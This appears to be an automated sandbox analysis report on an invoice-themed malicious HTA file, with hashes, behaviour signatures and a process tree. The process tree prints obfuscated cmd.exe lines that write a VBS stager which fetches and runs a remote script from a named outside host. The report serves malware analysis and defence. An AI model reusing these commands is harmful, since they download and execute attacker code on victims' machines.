Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    13/05/2024, 16:39

General

  • Target

    Su-Factura-2709784.hta

  • Size

    1KB

  • MD5

    3f5c71b21594d8da434f6ab9b31b021a

  • SHA1

    f2b5e5d5d244f08d3f3d28abb01ec395b212f7db

  • SHA256

    183004136f92ee51ca608419dafb6c7df9004cf1ef6898143e85eb3eb93b9e11

  • SHA512

    0e80b6be18dfcae58fa109f433f8c1d9fe6110fce3bbf11cff576f100b4486c9bebe750cd6ce8ef942546eafe04f165f63ac922e2138b34fa700cec1f3677670

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Su-Factura-2709784.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "echo m3t94="ri">C:\Users\Public\MLlgEf63.vbs&&echo KSYptbP50="tp">>C:\Users\Public\MLlgEf63.vbs&&echo qYrg7=".":mYMMRW23="sC" ^& m3t94 ^& "pt:ht" ^& KSYptbP50 ^& "s://">>C:\Users\Public\MLlgEf63.vbs"
      2⤵
        PID:3052
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"mYMMRW23^=mYMMRW23 ^& ^"162"+qYrg7+"200"+qYrg7+"178"+qYrg7+"68"+qYrg7+"host"+qYrg7+"secureserver"+qYrg7+"net/g1^":GetO^">>C:\Users\Public\\MLlgEf63.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\MLlgEf63.vbs
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo"
          3⤵
            PID:3404
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" set /p="mYMMRW23=mYMMRW23 & "162"+qYrg7+"200"+qYrg7+"178"+qYrg7+"68"+qYrg7+"host"+qYrg7+"secureserver"+qYrg7+"net/g1":GetO" 1>>C:\Users\Public\\MLlgEf63.vbs"
            3⤵
              PID:2900
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo"
              3⤵
                PID:2008
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\MLlgEf63.vbs"
                3⤵
                  PID:1184

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Public\MLlgEf63.vbs

              Filesize

              92B

              MD5

              0248b5d19fce30abf010124180bfb4b8

              SHA1

              0207511208ea7a47ad5b170bd339ae8281c0cc99

              SHA256

              a0cb0e1bf16b345141819a497b10c27e56245db5813a463a3b550720a278407b

              SHA512

              2d0d6bda85985b77f9d5313ee304d37fef4c7af4616bb44387ba52fcc8529d684330c0ff1f12e4c07cb6dfb9d5918cf2424ba3124260c56dfcc84c144e4b5e37

            • C:\Users\Public\MLlgEf63.vbs

              Filesize

              212B

              MD5

              19296be7fff334ba43a793095e3671a9

              SHA1

              0b86a0683db59a5df1b35631a1403a2a601d64f8

              SHA256

              768f66e53b0732b6eb2e0c7597f30c741a79f16c0af571f1e48f1bd364627440

              SHA512

              013e7158949be0c491a594238dfac43db28e6f4b316ad71e5cfb6a3172eda4ffabf3101871c41d1801ffc7cae98c33521a16553988285995d3b6ed37f69dfa2c